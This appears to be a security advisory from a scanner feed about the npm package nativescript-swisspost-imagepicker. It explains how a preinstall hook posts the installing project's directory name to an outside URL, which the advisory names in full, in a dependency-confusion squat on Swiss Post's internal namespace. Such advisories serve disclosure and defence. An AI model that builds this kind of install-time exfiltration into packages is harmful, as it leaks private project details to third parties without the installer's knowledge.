nativescript-swisspost-imagepicker @52.31.0

Summary

package.json declares preinstall: node index.js . On npm install , index.js reads process.env.INIT_CWD (the installing project's working directory), takes its basename, and POSTs a JSON payload {pkg, timestamp, transport, project} to the hardcoded URL https://deepbounty.dd06-dev.fr/cb/d27071f6-8aa6-43b9-98be-0caf9803fba5 . The package name nativescript-swisspost-imagepicker , the package description ( Security PoC for Bug Bounty ), and the comment Harmless dependency confusion PoC in index.js identify this as a dependency-confusion squat targeting an internal Swiss Post NativeScript namespace. On install, the installer's internal project name is silently leaked to a third-party endpoint, confirming the existence and naming of private packages and giving the operator of deepbounty.dd06-dev.fr a directory of organizations whose builds resolved this public package. Author self-labelling it as a bug-bounty PoC does not change the installer-side impact: unsolicited install-time outbound network carrying installer-side identifiers to an attacker-controlled host.

Source: amazon-inspector (b2271ce1525f722f302ee59b9de3270020e6d1aa84d74cc2972cb6ffa34d9a62)